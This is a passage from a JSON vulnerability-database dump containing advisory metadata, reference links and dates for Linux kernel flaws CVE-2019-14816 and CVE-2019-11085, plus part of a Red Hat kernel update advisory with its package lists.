        "title": "mwifiex: Fix three heap overflow at parsing element in cfg80211_ap_settings",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Bug 1744149",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14816"
      },
      {
        "title": "CVE-2019-14816",
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-14816"
      },
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=97659"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-122",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-120",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 4.0,
        "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
      },
      {
        "trust": 2.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-14816"
      },
      {
        "trust": 2.3,
        "url": "https://access.redhat.com/errata/rhsa-2020:0374"
      },
      {
        "trust": 2.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4157-1/"
      },
      {
        "trust": 2.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:0339"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0661"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0653"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0375"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0664"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-2/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-1/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0328"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0204"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-1/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-2/"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14816"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0174"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4157-2/"
      },
      {
        "trust": 1.4,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 1.4,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:1347"
      },
      {
        "trust": 0.6,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1744149"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:1353"
      },
      {
        "trust": 0.6,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7caac62ed598a196d6ddf8d9c121e12e082cac3a"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:1266"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192658-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192651-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156608/red-hat-security-advisory-2020-0664-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-net-wireless-marvell-mwifiex-30180"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1248/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0415/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157140/red-hat-security-advisory-2020-1347-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3835/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156020/red-hat-security-advisory-2020-0174-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0790/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154897/ubuntu-security-notice-usn-4157-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156216/red-hat-security-advisory-2020-0375-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1172/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3897/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3064/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2019-17133"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2019-14895"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17666"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4162-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15918"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4162-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4157-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20856"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "date": "2019-10-23T18:28:53",
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "date": "2020-02-05T18:37:11",
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "date": "2020-03-03T14:09:01",
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "date": "2019-10-17T15:18:45",
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "date": "2020-03-03T14:08:50",
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "date": "2020-02-05T18:49:35",
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "date": "2020-04-07T16:41:32",
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "date": "2020-03-03T16:33:49",
        "db": "PACKETSTORM",
        "id": "156608"
      },
      {
        "date": "2019-08-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "date": "2019-09-20T19:15:11.767000",
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "date": "2023-03-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "date": "2023-07-12T19:27:37.873000",
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to classic buffer overflow",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "overflow",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      }
    ],
    "trust": 0.6
  }
}

var-201905-1057
Vulnerability from variot

Insufficient input validation in Kernel Mode Driver in Intel(R) i915 Graphics for Linux before version 5.0 may allow an authenticated user to potentially enable escalation of privilege via local access. Linux for Intel(R) i915 Graphics Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to to gain elevated privileges. Linux versions prior to 5.0 are vulnerable. (CVE-2018-13053). 7.5) - ppc64, ppc64le, x86_64

Bug Fix(es):

  • [Hyper-V][RHEL7.6]Hyper-V guest waiting indefinitely for RCU callback when removing a mem cgroup (BZ#1783175)

Enhancement(s):

  • Selective backport: perf: Sync with upstream v4.16 (BZ#1782751)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2019:1873-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:1873 Issue date: 2019-07-29 CVE Names: CVE-2018-16871 CVE-2018-16884 CVE-2019-11085 CVE-2019-11811 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Security Fix(es):

  • kernel: nfs: use-after-free in svc_process_common() (CVE-2018-16884)

  • kernel: insufficient input validation in kernel mode driver in Intel i915 graphics leads to privilege escalation (CVE-2019-11085)

  • kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence (CVE-2018-16871)

  • kernel: use-after-free in drivers/char/ipmi/ipmi_si_intf.c, ipmi_si_mem_io.c, ipmi_si_port_io.c (CVE-2019-11811)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es) and Enhancement(s):

These updated kernel packages include also numerous bug fixes and add several enhancements. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article: https://access.redhat.com/articles/4309211

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-957.27.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm kernel-doc-3.10.0-957.27.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.27.2.el7.x86_64.rpm kernel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-headers-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm perf-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-957.27.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm kernel-doc-3.10.0-957.27.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.27.2.el7.x86_64.rpm kernel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-headers-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm perf-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-957.27.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm kernel-doc-3.10.0-957.27.2.el7.noarch.rpm

ppc64: kernel-3.10.0-957.27.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-957.27.2.el7.ppc64.rpm kernel-debug-3.10.0-957.27.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-957.27.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-957.27.2.el7.ppc64.rpm kernel-devel-3.10.0-957.27.2.el7.ppc64.rpm kernel-headers-3.10.0-957.27.2.el7.ppc64.rpm kernel-tools-3.10.0-957.27.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-957.27.2.el7.ppc64.rpm perf-3.10.0-957.27.2.el7.ppc64.rpm perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm python-perf-3.10.0-957.27.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm

ppc64le: kernel-3.10.0-957.27.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debug-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.27.2.el7.ppc64le.rpm kernel-devel-3.10.0-957.27.2.el7.ppc64le.rpm kernel-headers-3.10.0-957.27.2.el7.ppc64le.rpm kernel-tools-3.10.0-957.27.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-957.27.2.el7.ppc64le.rpm perf-3.10.0-957.27.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm python-perf-3.10.0-957.27.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm

s390x: kernel-3.10.0-957.27.2.el7.s390x.rpm kernel-debug-3.10.0-957.27.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.s390x.rpm kernel-debug-devel-3.10.0-957.27.2.el7.s390x.rpm kernel-debuginfo-3.10.0-957.27.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-957.27.2.el7.s390x.rpm kernel-devel-3.10.0-957.27.2.el7.s390x.rpm kernel-headers-3.10.0-957.27.2.el7.s390x.rpm kernel-kdump-3.10.0-957.27.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-957.27.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-957.27.2.el7.s390x.rpm perf-3.10.0-957.27.2.el7.s390x.rpm perf-debuginfo-3.10.0-957.27.2.el7.s390x.rpm python-perf-3.10.0-957.27.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.s390x.rpm

x86_64: bpftool-3.10.0-957.27.2.el7.x86_64.rpm kernel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-headers-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm perf-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

